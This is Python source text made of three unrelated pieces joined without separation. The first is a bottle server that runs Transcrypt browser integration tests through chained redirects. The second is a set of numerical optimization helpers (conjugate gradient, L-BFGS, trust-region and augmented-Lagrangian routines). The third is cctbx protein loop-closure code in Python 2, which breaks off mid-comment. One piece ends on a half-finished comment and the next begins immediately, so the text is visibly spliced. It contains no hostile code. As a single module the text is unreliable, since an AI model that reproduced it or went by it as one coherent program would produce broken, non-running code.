# redir: html page whose script immediately navigates to the given url
redir = html_tmpl % ('%s', 'window.location.href="%s";')


def cd():
    'back to integration test dir'
    os.chdir('%(d_i)s' % env)


@route('/chk/<test:path>')
def chk(test):
    '''
    a single test, intended for browser - stopping after running at the .html
    - test might contain flags (hello::-b -n -c -da -e 5).
    - if not we take the first flag set from test_flags
    '''
    if not '::' in test:
        test += '::' + test_flags[0]
    test = unalias(test)
    reset_ctx()
    # stop=1 makes run_test() halt after this single test:
    ctx['stop'] = 1
    ctx['init_url'] = '/chk/%s' % test
    return index(tests=test, single=1)


@route('/')
@route('/do/<tests:path>')
def index(tests=0, single=None):
    ''' we keep track of which test is run via the ctx structure
    and repeatadly call ourselves'''
    if 'favico' in str(tests):
        return ''
    if not tests and not T:
        # no args -> give info:
        return '<br>'.join((
            'Need a comma seped. list of tests to run, e.g. /do/hello,time',
            'You can also call a single test like /chk/hello or /chk/.dictionaries'))
    cd()
    if not T:
        # first run: build up the global test list T
        if not single:
            reset_ctx()
            ctx['init_url'] = '/do/%s' % tests
        if os.path.exists('./%s' % tests):
            # `tests` names a file containing a test list
            info(I('loading test set'))
            with open(tests) as fd:
                tests = fd.read()
            # ignoring '# ...' lines, using 'foo' in 'foo # comment' lines:
            tests = [k.split('#')[0].strip() for k in tests.splitlines() \
                     if k and not k.startswith('#')]
        else:
            # alternative form: comma separated list in the url
            tests = [k.strip() for k in tests.split(',')]
        # expand every test without explicit flags into one entry per flag set:
        _t = []
        for t in tests:
            if '::' in t:
                _t.append(t)
                continue
            for flags in test_flags:
                _t.append(t + '::' + flags)
        tests = _t
        T.extend(tests)
        if exists(stop_flag):
            os.unlink(stop_flag)
        T.append(test_end_marker)
    t = ctx['cur_test']
    # when we come again for the next test, this was the last we ran:
    last = ctx.get('cur_test')
    if last:
        ctx['have_run'].append(last)
    # next test:
    t = ctx['cur_test'] = T[0] if not t else T[T.index(t) + 1]
    t = unalias(t)
    if t == test_end_marker:
        # all done - render links to re-run each test individually:
        ts = ['<a href="/chk/%s">%s</a>' % (k, k) \
              for k in ctx.get('have_run', ())]
        testlist = '<ul><li>' + '</li><li>'.join(ts) + '</li></ul>'
        return stop('All tests finished:Success.', postfix=testlist)
    for s in ('', 'Next test', I('-' * 20), M(t), I('-' * 20)):
        info(s)
    # browser is redirected to the runner for the next test:
    return redir % ('', '/run_test/' + t)


def unalias(t):
    # expand the '.foo' shortcut to 'transcrypt/foo'
    if t.startswith('.'):
        # shortcut
        t = 'transcrypt/' + t[1:]
    return t


def short(d):
    # strip the repo root prefix for display
    return d.replace(env['d_0'] + '/', '')


def run_t(*args):
    'invoke transcrypt with flags; returns verbose output on failure, else None'
    args = ' '.join(args)
    # '__' is the url/CLI-safe encoding of a space in flag sets:
    args = args.replace('__', ' ')
    dbg_args = ' -v ' + args
    # NOTE(review): env['run_transcr'] is set elsewhere (not visible here) -
    # verify it is always present before this is called.
    cmd = '%s %s' % (env['run_transcr'], args)
    dbg_cmd = '%s %s' % (env['run_transcr'], dbg_args)
    info('Invoking transcrypt: %s' % I(short(os.getcwd())), M(short(cmd)))
    if os.system(cmd):
        # failed: re-run verbosely and hand back the output as error text
        return os.popen(dbg_cmd + ' 2>&1').read()
# ci.py template; %s e.g. dictionaries, we are in its parent dir when
# writing this:
ci_at = '''
import org.transcrypt.autotester
import %s
autoTester = org.transcrypt.autotester.AutoTester ()
%s.run(autoTester)
autoTester.done ()
'''


@route('/run_test/<filepath:path>')
def run_test(filepath):
    '''
    Called 3 times per test (filepath like <testdir>::<flags>)
    1. filepath = the test and the flags -> cd to the test dir,
       returning redir to:
    2. filepath = 'test_html' (compiling in the test dir -> autotest.html
       created, which we return)
    3. filepath = '__javascript__/autotest.js' (fetching the js from within
       the html) the js is augemented with the result check and a redir to
       calling url, closing the loop
    '''
    flags = ctx.get('cur_flags', '')
    if '::' in filepath:
        filepath, flags = filepath.split('::', 1)
        ctx['cur_flags'] = flags
    if '__javascript__' in filepath:
        # phase 3: serve the compiled js, augmented with the result hook
        with open(filepath) as fd:
            js = fd.read()
        if not ctx.get('stop'):
            # we are alraedy in d:
            js += ('\nlocation.href="/result?test=%s&flags=%s&res=" + '
                   'document.getElementById("message").innerHTML;') % (
                       os.getcwd(), flags)
        else:
            # single test mode: just restore the original url, no forward
            js += ('\nhistory.pushState({}, null, "%(init_url)s");' % ctx)
            reset_ctx()
        js += '\n\n'
        # outputting the js - too much for travis:
        #splt = "var run = function (autoTester) {"
        #if splt in js:
        #    debug(js.split(splt, 1)[1])
        return js
    if not filepath.startswith('test_html'):
        # phase 1: the compile takes long so we display a message, while we
        # redir to this method again:
        d = j(env['d_at'], filepath)
        os.chdir(d)
        return redir % ('compiling tests in %s... (using %s)' % (d, flags),
                        '/run_test/test_html::' + flags)
    # phase 2: compile in the current test dir
    d = os.getcwd()
    env['PYTHONPATH'] = '.'
    fn = 'autotest'
    if not '%s.py' % fn in os.listdir(d):
        if not '__init__.py' in os.listdir(d):
            # neither autotest.py nor a package -> cannot test this dir
            return redir % ('err', '/result?test=%s&flags=%s&res=ERROR' % (
                d, flags))
        print ((M('creating ci autotest.py file')))
        fn = 'ci'
    d_was = d
    if fn == 'ci':
        # subfolder without autotest.py: generate a ci.py in the parent dir
        # from the ci_at template (see module docstring)
        d, test = d.rsplit('/', 1)
        os.chdir(d)
        with open(fn + '.py', 'w') as fd:
            fd.write(ci_at % (test, test))
    err = None
    for _flags in ['-r %s' % flags, flags]:
        err = run_t(_flags, './%s.py' % fn)
        if err:
            break
    #env['PYTHONPATH'] = '/root/Transcrypt/transcrypt/modules:.'
    with open('%s.html' % fn) as fd:
        html = fd.read()
    html = '<h4>%s</h4>' % d_was + html
    if err:
        html = '<h1>ERROR</h1><hr><pre>%s</pre>' % err
    if ctx.get('stop'):
        # this is a single test, run via /chk/<test>
        # the test has to load still, need the stopflag not to be deleted:
        # otherwise the js would be augmented with the href forward:
        return stop(html, no_reset=True)
    # if the js fails we would not get a result hit, so schedule a delayed
    # ERROR report which result() kills again when the real hit arrives:
    if err:
        global max_wait
        max_wait = 0
    # NOTE(review): `port` is a module global not visible in this chunk -
    # verify it is defined before the first request.
    cmd = ['sleep %s' % max_wait,
           ('wget -q "http://127.0.0.1:%s/result?'
            'test=%s&flags=%s&res=ERROR" -O /dev/null') % (port, d, flags)]
    # pid:
    ctx['error_reporter'] = subprocess.Popen(' && '.join(cmd), shell=True)
    return html


@route('/result')
def result():
    # endpoint hit by the augmented js (or the error_reporter fallback)
    info('result reported')
    debug('test', request.query.test)
    debug('res', request.query.res)
    debug('flags', request.query.flags)
    try:
        # a real result arrived - cancel the pending fallback ERROR report
        ctx['error_reporter'].kill()
    except:
        pass
    res = request.query.res
    test = request.query.test
    flags = request.query.flags
    # the result div of the autotest html:
    if not 'green' in res and not 'succeeded' in res:
        return stop('ERROR %s %s' % (test, res))
    info(G('SUCCESS'), test)
    return redir % ('next test', '/do/next')


def reset_ctx():
    # clear the global test list and the run context
    while T:
        T.pop()
    ctx['cur_test'] = None
    ctx['have_run'] = []
    ctx.pop('stop', 0)
    ctx.pop('init_url', 0)


def stop(msg, postfix='', no_reset=False):
    'no redir here, just a static page'
    iu = ctx.get('init_url')
    if not no_reset:
        reset_ctx()
    # the stop flag file signals the outer test driver that we are done:
    with open(stop_flag, 'w') as fd:
        fd.write(msg)
    col = G
    if 'ERROR' in msg:
        col = R
    msg += '[%s set]' % stop_flag
    if not ctx.get('stop'):
        info(col(msg))
    if iu:
        postfix = '<hr>Rerun <a href="%s">%s</a>' % (iu, iu) + postfix
    return msg + postfix


# ------------------------------------------------------ dev mode (auto reload)
def uq(s):
    # NOTE(review): urllib.unquote is Python 2 only; on Python 3 this is
    # urllib.parse.unquote - confirm which interpreter serves this module.
    return urllib.unquote(s)


import threading
fs_changed = threading.Event()
# max reload of test result page at
def function_f_x_k(funcs, args, x_0, mu=None):
    '''
    Evaluate the objective at the iterate x_0, optionally adding an
    L1-style regularization term mu * sum(|x_i|).

    funcs : sympy Matrix - objective function(s)
    args : sympy Matrix - symbolic parameters
    x_0 : list or tuple - current iterate
    mu : float or None - regularization weight

    Returns float: the (regularized) objective value.
    '''
    import numpy as np
    funcsv = np.array(funcs.subs(dict(zip(args, x_0)))).astype(np.float64)
    if mu is not None:
        for i in x_0:
            funcsv += mu * np.abs(i)
    return funcsv[0][0]

def function_plot_iteration(f, draw, method):
    '''
    Plot the objective value per iteration (no-op unless draw is True).

    f : list - objective values per iteration
    draw : bool - whether to plot
    method : string - title (optimization method name)
    '''
    import matplotlib.pyplot as plt
    if draw is True:
        plt.plot([i for i in range(len(f))], f, marker='o', c="maroon", ls='--')
        plt.xlabel("$k$")
        plt.ylabel("$f(x_k)$")
        plt.title(method)
        plt.show()
    return None

def function_Q_k(eta, k):
    '''
    Recurrence Q_k = eta * Q_{k-1} + 1 with Q_0 = 1.

    eta : float - constant
    k : int - iteration index (>= 0)

    Returns float.
    '''
    assert k >= 0
    if k == 0:
        return 1
    else:
        return eta * function_Q_k(eta, k-1) + 1

def function_C_k(funcs, args, point, eta, k):
    '''
    Weighted-average reference value C_k used by nonmonotone line searches:
    C_k = (eta*Q_{k-1}*C_{k-1} + f(x_k)) / Q_k, C_0 = f(x_0).

    funcs : sympy Matrix - objective
    args : sympy Matrix - parameters
    point : list - iterate history (point[k] is the k-th iterate)
    eta : float - constant
    k : int - current iteration (>= 0)

    Returns float (1x1 numpy array for k > 0, matching the original).
    '''
    import numpy as np
    assert k >= 0
    if k == 0:
        return np.array(funcs.subs(dict(zip(args, point[0])))).astype(np.float64)
    else:
        return (1 / (function_Q_k(eta, k))) * \
            (eta * function_Q_k(eta, k-1) * function_C_k(funcs, args, point, eta, k - 1) +
             np.array(funcs.subs(dict(zip(args, point[k])))).astype(np.float64))

def function_get_f_delta_gradient(resv, argsv, mu, delta):
    '''
    Smoothed (Huber-like) gradient of f + mu*|x|: outside |x| > delta the
    sign of x is used, inside the linear ramp x/delta.

    resv : numpy.array - current gradient values
    argsv : numpy.array - current parameter values
    mu : float - regularization weight
    delta : float - smoothing width

    Returns float: first component of the smoothed gradient.
    '''
    import numpy as np
    f = []
    for i, j in zip(resv, argsv):
        abs_args = np.abs(j)
        if abs_args > delta:
            if j > 0:
                f.append(i + mu * 1)
            elif j < 0:
                f.append(i - mu * 1)
        else:
            f.append(i + mu * (j / delta))
    return f[0]

def function_get_subgradient(resv, argsv, mu):
    '''
    Subgradient of f + mu*|x|: sign(x) where x != 0, a random value in
    [-1, 1) where x == 0.

    resv : numpy.array - current gradient values
    argsv : numpy.array - current parameter values
    mu : float - regularization weight

    Returns float: first component of the subgradient.
    '''
    import numpy as np
    f = []
    for i, j in zip(resv, argsv):
        if j > 0:
            f.append(i + mu * 1)
        elif j == 0:
            f.append(i + mu * (2 * np.random.random_sample() - 1))
        else:
            f.append(i - mu * 1)
    return f[0]

def function_modify_hessian(hessian, m, pk=1):
    '''
    Add increasing multiples of the identity to `hessian` until it is
    positive definite with condition number at most m.

    hessian : numpy.array - unmodified Hessian
    m : float - condition number threshold
    pk : int - initial shift increment

    Returns numpy.array: the modified Hessian.
    '''
    import numpy as np
    n = hessian.shape[0]
    while 1:
        values, _ = np.linalg.eig(hessian)
        # BUG FIX: the original used `all(values) > 0`, which compares the
        # *boolean* all(values) against 0 and therefore accepts matrices
        # with negative eigenvalues. Positive definiteness requires every
        # eigenvalue to be strictly positive:
        flag = np.all(values > 0) and (np.linalg.cond(hessian) <= m)
        if flag:
            break
        else:
            hessian = hessian + pk * np.identity(n)
            pk = pk + 1
    return hessian

def function_CG_gradient(A, b, dk, epsilon=1e-6, k=0):
    '''
    Conjugate gradient solve of A d = b^T starting from dk.

    A : numpy.array - matrix
    b : numpy.array - row vector
    dk : numpy.array - initial direction (column vector)
    epsilon : float - tolerance on the search direction norm
    k : int - iteration counter start

    Returns tuple: (solution as row vector, iterations performed).
    '''
    import numpy as np
    rk = b.T - A.dot(dk)
    pk = rk
    while 1:
        if np.linalg.norm(pk) < epsilon:
            break
        ak = (rk.T).dot(rk) / ((pk.T).dot(A)).dot(pk)
        dk = dk + ak * pk
        bk_down = (rk.T).dot(rk)
        rk = rk - ak * A.dot(pk)
        bk = (rk.T).dot(rk) / bk_down
        pk = rk + bk * pk
        k = k + 1
    return dk.reshape(1, -1), k

def function_L_BFGS_double_loop(q, p, s, y, m, k, Hkm):
    '''
    L-BFGS two-loop recursion producing the search direction -H_k * q.

    q : numpy.array - initial gradient (row vector)
    p : list - rho_k history
    s : list - s_k history
    y : list - y_k history
    m : int - memory size
    k : int - iteration count
    Hkm : numpy.array - initial matrix H_k^0

    Returns numpy.array: search direction (row vector).
    '''
    import numpy as np
    istart1 = max(0, k - 1)
    iend1 = max(0, k - m - 1)
    istart2 = max(0, k - m)
    iend2 = max(0, k)
    alpha = np.empty((k, 1))
    # first loop: newest to oldest
    for i in range(istart1, iend1, -1):
        alphai = p[i] * s[i].dot(q.T)
        alpha[i] = alphai
        q = q - alphai * y[i]
    r = Hkm.dot(q.T)
    # second loop: oldest to newest
    for i in range(istart2, iend2):
        beta = p[i] * y[i].dot(r)
        r = r + (alpha[i] - beta) * s[i].T
    return - r.reshape(1, -1)

# 截断共轭梯度法实现 (truncated conjugate gradient implementation)
def function_Eq_Sovle(sk, pk, delta):
    '''
    Solve ||sk + m * pk|| = delta for the positive root m (trust region
    boundary intersection).

    sk : numpy.array - current step (row vector)
    pk : numpy.array - direction (row vector)
    delta : float - trust region radius

    Returns the positive sympy solution m.
    '''
    import sympy as sp
    m = sp.symbols("m", positive=True)
    r = (sk + m * pk)[0]
    sub = 0
    for i in r:
        sub += i**2
    h = sp.sqrt(sub) - delta
    mt = sp.solve(h)
    return mt[0]

def function_steihaug_CG(sk, rk, pk, B, delta, epsilon=1e-3, k=0):
    '''
    Steihaug truncated CG for the trust-region subproblem.

    sk : list - initial step
    rk : numpy.array - gradient (row vector)
    pk : numpy.array - negative gradient direction (row vector)
    B : numpy.array - (modified) Hessian
    delta : float - trust region radius
    epsilon : float - relative residual tolerance
    k : int - iteration counter start

    Returns tuple: (step, iterations).
    '''
    import numpy as np
    s = []
    r = []
    p = []
    while 1:
        s.append(sk)
        r.append(rk)
        p.append(pk)
        pbp = (p[k].dot(B)).dot(p[k].T)
        if pbp <= 0:
            # negative curvature: go to the trust region boundary
            m = function_Eq_Sovle(s[k], p[k], delta)
            ans = s[k] + m * p[k]
            break
        alphak = np.linalg.norm(r[k])**2 / pbp
        sk = s[k] + alphak * p[k]
        if np.linalg.norm(sk) > delta:
            # step leaves the trust region: clip to the boundary
            m = function_Eq_Sovle(s[k], p[k], delta)
            ans = s[k] + m * p[k]
            break
        rk = r[k] + alphak * (B.dot(p[k].T)).T
        if np.linalg.norm(rk) < epsilon * np.linalg.norm(r[0]):
            ans = sk
            break
        betak = np.linalg.norm(rk)**2 / np.linalg.norm(r[k])**2
        pk = - rk + betak * p[k]
        k = k + 1
    return ans.astype(np.float64), k

def function_cons_unequal_L(cons_unequal, args, muk, sigma, x_0):
    '''
    Augmented-Lagrangian penalty term for inequality constraints.

    cons_unequal : sympy Matrix - inequality constraints
    args : sympy Matrix - parameters
    muk : list - multiplier estimates
    sigma : float - penalty parameter
    x_0 : list or tuple - current iterate

    Returns sympy Matrix: the penalty expression.
    '''
    import numpy as np
    import sympy as sp
    sub = 0
    for i in range(cons_unequal.shape[0]):
        cons = muk[i] / sigma + cons_unequal[i]
        con = sp.Matrix([cons])
        conv = np.array(con.subs(dict(zip(args, x_0)))).astype(np.float64)
        if conv > 0:
            sub = sub + (cons**2 - (muk[i] / sigma)**2)
        else:
            sub = sub - (muk[i] / sigma)**2
    sub = sp.Matrix([sub])
    return sub

def function_v_k(cons_equal, cons_unequal, args, muk, sigma, x_0):
    '''
    Constraint violation measure used as the augmented-Lagrangian
    termination quantity.

    cons_equal : sympy Matrix or None - equality constraints
    cons_unequal : sympy Matrix - inequality constraints
    args : sympy Matrix - parameters
    muk : list - multiplier estimates
    sigma : float - penalty parameter
    x_0 : list or tuple - current iterate

    Returns float.
    '''
    import numpy as np
    sub = 0
    reps = dict(zip(args, x_0))
    len_unequal = cons_unequal.shape[0]
    consv_unequal = np.array(cons_unequal.subs(reps)).astype(np.float64)
    if cons_equal is not None:
        consv_equal = np.array(cons_equal.subs(reps)).astype(np.float64)
        sub += (consv_equal.T).dot(consv_equal)
        for i in range(len_unequal):
            sub += (max(consv_unequal[i], - muk[i] / sigma))**2
    else:
        for i in range(len_unequal):
            sub += (max(consv_unequal[i], - muk[i] / sigma))**2
    return np.sqrt(sub)

def function_renew_mu_k(cons_unequal, args, muk, sigma, x_0):
    '''
    Multiplier update muk_i <- max(muk_i + sigma * c_i(x_0), 0).

    cons_unequal : sympy Matrix - inequality constraints
    args : sympy Matrix - parameters
    muk : list - multiplier estimates (updated in place and returned)
    sigma : float - penalty parameter
    x_0 : list or tuple - current iterate

    Returns list: the updated muk.
    '''
    import numpy as np
    reps = dict(zip(args, x_0))
    len_unequal = cons_unequal.shape[0]
    consv_unequal = np.array(cons_unequal.subs(reps)).astype(np.float64)
    for i in range(len_unequal):
        muk[i] = max(muk[i] + sigma * consv_unequal[i], 0)
    return muk

def function_data_convert(funcs, args, cons_equal=None, cons_unequal=None):
    '''
    Normalize user input (scalar, list or tuple) into sympy Matrix form.

    funcs : list/tuple/single expression - objective
    args : list/tuple/single symbol - parameters
    cons_equal : list/tuple/single expression or None - equality constraints
    cons_unequal : list/tuple/single expression or None - inequality constraints

    Returns the four inputs, each as a sympy Matrix (or None).

    NOTE(review): the tail of this function was truncated in the source I
    reviewed; the cons_equal/cons_unequal branches below were reconstructed
    by symmetry with the funcs/args branches - confirm against upstream.
    '''
    import sympy as sp
    # convert funcs
    if funcs is not None:
        if isinstance(funcs, (list, tuple)):
            funcs = sp.Matrix(funcs)
        else:
            funcs = sp.Matrix([funcs])
    # convert args
    if args is not None:
        if isinstance(args, (list, tuple)):
            args = sp.Matrix(args)
        else:
            args = sp.Matrix([args])
    # convert cons_equal
    if cons_equal is not None:
        if isinstance(cons_equal, (list, tuple)):
            cons_equal = sp.Matrix(cons_equal)
        else:
            cons_equal = sp.Matrix([cons_equal])
    # convert cons_unequal
    if cons_unequal is not None:
        if isinstance(cons_unequal, (list, tuple)):
            cons_unequal = sp.Matrix(cons_unequal)
        else:
            cons_unequal = sp.Matrix([cons_unequal])
    return funcs, args, cons_equal, cons_unequal
from __future__ import division
from libtbx import adopt_init_args
import mmtbx.utils
from mmtbx.building.loop_closure import utils
from mmtbx.validation.ramalyze import ramalyze, RAMALYZE_OUTLIER, \
    RAMALYZE_ALLOWED, RAMALYZE_FAVORED
from scitbx.matrix import project_point_on_axis
import math
from scitbx.array_family import flex
from libtbx.test_utils import approx_equal
from libtbx.utils import null_out
import boost.python
ext = boost.python.import_ext("mmtbx_validation_ramachandran_ext")
from mmtbx_validation_ramachandran_ext import rama_eval
ext2 = boost.python.import_ext("mmtbx_building_loop_closure_ext")
from mmtbx_building_loop_closure_ext import ccd_cpp

class _(boost.python.injector, ccd_cpp):
  # Injects a Python-level run() into the C++ ccd_cpp class (cyclic
  # coordinate descent loop closure). NOTE(review): Python 2 code
  # (print statements); boost.python.injector is deprecated in newer cctbx.
  def run(self, direction_forward=True, save_states=False):
    # Iteratively rotates backbone phi/psi bonds of self.moving_h so the
    # three moving reference atoms approach self.fixed_ref_atoms, keeping
    # every residue out of Ramachandran outlier regions.
    if save_states:
      self.states = mmtbx.utils.states(pdb_hierarchy=self.moving_h)
      self.states.add(sites_cart=self.moving_h.atoms().extract_xyz())
    phi_psi_atoms = utils.get_phi_psi_atoms(self.moving_h)
    if not direction_forward:
      phi_psi_atoms.reverse()
    # here we can start a ccd cycle
    self.n_iter = 0
    rmsd_good = 1000
    previous_rmsd = 1000
    self.early_exit = False
    # self.moving_h.write_pdb_file(file_name="start_ccd.pdb")
    while (rmsd_good > self.needed_rmsd
        and self.n_iter <= self.max_number_of_iterations
        and not self.early_exit):
      # print_rama_stats(phi_psi_atoms, r)
      # for phi_psi_pair in phi_psi_atoms[:-1]:
      # check rama again separately before the cycle
      # list_rama_outliers(phi_psi_atoms, r)
      for phi_psi_pair, rama_key in phi_psi_atoms:
        before_rama_score = utils.get_rama_score(
            phi_psi_pair, self.r, rama_key, round_coords=True)
        rama_score = before_rama_score
        # print "rama score:", rama_score, "->",
        for i, atoms in enumerate(phi_psi_pair):
          # current phi-psi angles:
          # find the optimal angle
          if atoms is None:
            continue
          if direction_forward:
            ccd_angle = self._find_angle(atoms[1].xyz, atoms[2].xyz)
          else:
            ccd_angle = self._find_angle(atoms[2].xyz, atoms[1].xyz)
          # print "phi_psi_angles", phi_psi_angles
          # rama_score = r.evaluate("general", phi_psi_angles)
          # print "rama_score", rama_score
          # clamp the raw CCD angle (see _modify_angle in ccd_python below)
          angle_modified = self._modify_angle(ccd_angle)
          # angle_modified = ccd_angle
          # print "ccd_angle", ccd_angle, angle_modified
          # angle_modified = - angle_modified
          phi_psi_angles = utils.get_pair_angles(phi_psi_pair)
          # print "phi_psi_angles", phi_psi_angles
          before_rotation_rama_score = utils.get_rama_score(
              phi_psi_pair, self.r, rama_key, round_coords=True)
          if (ramalyze.evalScore(rama_key, before_rotation_rama_score) ==
              RAMALYZE_OUTLIER):
              # or ramalyze.evalScore(rama_key, before_rotation_rama_score) == RAMALYZE_ALLOWED):
            # assert i == 0
            if i != 0:
              # this is a error, we should spot rama outliers on the first angle
              print "i", i
              print pair_info(phi_psi_pair)
              print "rama_key", rama_key
              print "before_rotation_rama_score", before_rotation_rama_score,
              print ramalyze.evalScore(rama_key, before_rotation_rama_score)
              break
            # correct it to the nearest non-outlier region
            target_phi_psi = utils.find_nearest_non_outlier_region(
                phi_psi_pair, self.r, rama_key)
            # print "For outlier:", phi_psi_angles, target_phi_psi
            # here we want to correct outlier regardless the target function
            # outcome and proceed to the next phi-psi pair
            now_psi_angle0 = utils.get_dihedral_angle(phi_psi_pair[1])
            utils.rotate_atoms_around_bond(
                self.moving_h, atoms[1], atoms[2],
                angle=-phi_psi_angles[0]+target_phi_psi[0],
                direction_forward=direction_forward)
            # now psi angle: the phi rotation must leave psi unchanged
            # (up to a full turn)
            now_psi_angle = utils.get_dihedral_angle(phi_psi_pair[1])
            # print "psi angles:", now_psi_angle0, now_psi_angle
            angles_ok = (
                approx_equal(now_psi_angle0-now_psi_angle, 0,
                    eps=1e-4, out=null_out()) or
                approx_equal(now_psi_angle0-now_psi_angle, 360,
                    eps=1e-4, out=null_out()) or
                approx_equal(now_psi_angle0-now_psi_angle, -360,
                    eps=1e-4, out=null_out()))
            if not angles_ok:
              # rerun without out=null_out() so the failure is printed
              approx_equal(now_psi_angle0-now_psi_angle, 0, eps=1e-4)
              approx_equal(now_psi_angle0-now_psi_angle, 360, eps=1e-4)
              approx_equal(now_psi_angle0-now_psi_angle, -360, eps=1e-4)
            assert angles_ok
            # approx_equal(now_psi_angle0, now_psi_angle)
            # assert now_psi_angle0 == now_psi_angle
            utils.rotate_atoms_around_bond(
                self.moving_h, atoms[2], atoms[3],
                angle=-now_psi_angle+target_phi_psi[1],
                direction_forward=direction_forward)
            # approx_equal(utils.get_dihedral_angle(phi_psi_pair[0]), target_phi_psi[0])
            # approx_equal(utils.get_dihedral_angle(phi_psi_pair[1]), target_phi_psi[1])
            resulting_rama_ev = utils.rama_evaluate(
                phi_psi_pair, self.r, rama_key)
            # print "evaluation:", resulting_rama_ev, RAMALYZE_FAVORED
            assert resulting_rama_ev == RAMALYZE_FAVORED, resulting_rama_ev
            break # we are done with this phi_psi_pair
          # rotate the whole thing around
          utils.rotate_atoms_around_bond(
              self.moving_h, atoms[1], atoms[2],
              angle=angle_modified, direction_forward=direction_forward)
          after_rotation_rama_score = utils.get_rama_score(
              phi_psi_pair, self.r, rama_key, round_coords=True)
          # print "before/after rotation rama:", before_rotation_rama_score, after_rotation_rama_score
          # if before_rotation_rama_score > after_rotation_rama_score:
          if ramalyze.evalScore(rama_key, after_rotation_rama_score) == \
              RAMALYZE_OUTLIER:
            # rotate back!!! / not always
            # print "  rotate back"
            if True: # always
              utils.rotate_atoms_around_bond(
                  self.moving_h, atoms[1], atoms[2],
                  angle=-angle_modified,
                  direction_forward=direction_forward)
              s = utils.get_rama_score(
                  phi_psi_pair, self.r, rama_key, round_coords=True)
              assert utils.rama_score_evaluate(rama_key, s) != \
                  RAMALYZE_OUTLIER, s
        # new rama score:
        after_rama_score = utils.get_rama_score(phi_psi_pair, self.r, rama_key)
        if after_rama_score + 1e-7 < before_rama_score:
          pass
          # print "before, after", before_rama_score, after_rama_score
          # STOP()
      rmsd_good = utils.get_rmsd_xyz_fixed(
          self.fixed_ref_atoms,
          [self.moving_h.atoms()[x] for x in self.moving_ref_atoms_iseqs])
      self.resulting_rmsd = rmsd_good
      # print "n_iter, rmsd:", self.n_iter, rmsd_good
      # print get_main_chain_rmsd(moving_h, original_h)
      if save_states:
        self.states.add(sites_cart=self.moving_h.atoms().extract_xyz())
      # if n_iter % 100 == 0:
      #   moving_h.write_pdb_file(file_name="int_%d.pdb" % n_iter)
      self.n_iter += 1
      # converged when the rmsd improvement gets tiny:
      self.early_exit = abs(previous_rmsd - rmsd_good) < self.convergence_diff
      # if self.early_exit:
      #   print "  Early exit:", self.early_exit, previous_rmsd - rmsd_good
      previous_rmsd = rmsd_good
    # print "number of iterations:", n_iter
    # print_rama_stats(phi_psi_atoms, r)
    # moving_h.write_pdb_file(file_name="int_%d.pdb" % n_iter)
    # states.write(file_name="all_states.pdb")
    # return rmsd_good, states, n_iter

class ccd_python():
  # Pure-Python reference implementation of the same CCD loop closure
  # as the injected C++-backed run() above (forward direction only).
  def __init__(self, fixed_ref_atoms, moving_h, moving_ref_atoms_iseqs,
      max_number_of_iterations=500, needed_rmsd=0.1):
    """
    fixed_ref_atoms - list of 3 atom objects, actually, only xyz's are needed
    moving_ref_atoms_iseqs - list of 3 indeces matching atoms in
      moving_h.atoms()[<here!>].
    moving_h - hierarchy to make closure. Atom positions in it will be changed!
    """
    assert len(fixed_ref_atoms) == 3
    assert len(moving_ref_atoms_iseqs) == 3
    assert moving_h is not None
    assert moving_h.atoms_size() > 10 # arbitrary
    # adopt_init_args(self, locals())
    self.moving_h = moving_h
    self.fixed_ref_atoms = fixed_ref_atoms
    self.moving_ref_atoms_iseqs = moving_ref_atoms_iseqs
    self.max_number_of_iterations = max_number_of_iterations
    self.needed_rmsd = needed_rmsd
    self.set_modify_angle_procedure(self._modify_angle)
    self.r = rama_eval()
    # self.states = mmtbx.utils.states(pdb_hierarchy=moving_h)
    self.convergence_diff = 1e-5
    # will be bool, True if converged before max_number_of_iterations reached
    self.early_exit = None
    self.resulting_rmsd = None

  def set_modify_angle_procedure(self, procedure):
    """
    can be used to set external procedure for angle modification.
    the only argument should be angle, should return new angle in degrees
    """
    self.modify_angle_procedure = procedure

  def _modify_angle(self, angle):
    """
    change angle found by minimization. Primary use - to avoid huge turns
    in first phi-psi angles.
    """
    # clamp to +-1 degree per move
    threshold = 1
    if abs(angle) > threshold:
      if angle > 0:
        return threshold
      else:
        return -threshold
    else:
      return angle

  @staticmethod
  def _get_f_r_s(axis_point_1, axis_point_2, moving_coor, fixed_coor):
    # Decompose the fixed/moving points relative to the rotation axis:
    # returns (f, s_home, r_norm, r_home) per the classic CCD derivation,
    # where f is the fixed-point offset from the axis, r_home/s_home the
    # orthonormal in-plane basis and r_norm the moving-point radius.
    fc_proj = project_point_on_axis(axis_point_1, axis_point_2, fixed_coor)
    mc_proj = project_point_on_axis(axis_point_1, axis_point_2, moving_coor)
    f = (fixed_coor[0]-fc_proj[0],
         fixed_coor[1]-fc_proj[1],
         fixed_coor[2]-fc_proj[2])
    r = (moving_coor[0]-mc_proj[0],
         moving_coor[1]-mc_proj[1],
         moving_coor[2]-mc_proj[2])
    ap_21 = (axis_point_2[0]-axis_point_1[0],
             axis_point_2[1]-axis_point_1[1],
             axis_point_2[2]-axis_point_1[2])
    r_norm = math.sqrt(r[0]*r[0]+r[1]*r[1]+r[2]*r[2])
    r_home = flex.vec3_double([(r[0]/r_norm, r[1]/r_norm, r[2]/r_norm)])
    ap_21_norm = math.sqrt(
        ap_21[0]*ap_21[0]+ap_21[1]*ap_21[1]+ap_21[2]*ap_21[2])
    theta_home = flex.vec3_double(
        [(ap_21[0]/ap_21_norm, ap_21[1]/ap_21_norm, ap_21[2]/ap_21_norm)])
    tt = theta_home.cross(r_home)
    s_home = tt*(1/tt.norm())
    return flex.vec3_double([f]), s_home, r_norm, r_home

  def _find_angle(self, axis_point_1, axis_point_2):
    # Optimal CCD rotation (degrees) around the given axis that best
    # superposes the three moving reference atoms on the fixed ones.
    f_all = []
    s_home_all = []
    r_all = []
    r_home_all = []
    for fixed_xyz, moving_xyz in zip(
        [x.xyz for x in self.fixed_ref_atoms],
        [self.moving_h.atoms()[x].xyz for x in self.moving_ref_atoms_iseqs]):
      f, s_home, r_norm, r_home = ccd_python._get_f_r_s(
          axis_point_1, axis_point_2, moving_xyz, fixed_xyz)
      f_all.append(f)
      s_home_all.append(s_home)
      r_all.append(r_norm)
      r_home_all.append(r_home)
    # calculating
    b = 0
    c = 0
    for i in range(3):
      b += list(2*r_all[i]*(f_all[i].dot(r_home_all[i])))[0]
      c += list(2*r_all[i]*(f_all[i].dot(s_home_all[i])))[0]
    znam = math.sqrt(b*b+c*c)
    sin_alpha = c/znam
    cos_alpha = b/znam
    alpha = math.atan2(sin_alpha, cos_alpha)
    # print "ver3 alpha:", math.degrees(alpha)
    return math.degrees(alpha)

  def run(self):
    # Forward-only CCD loop; mirrors the injected run() above but uses the
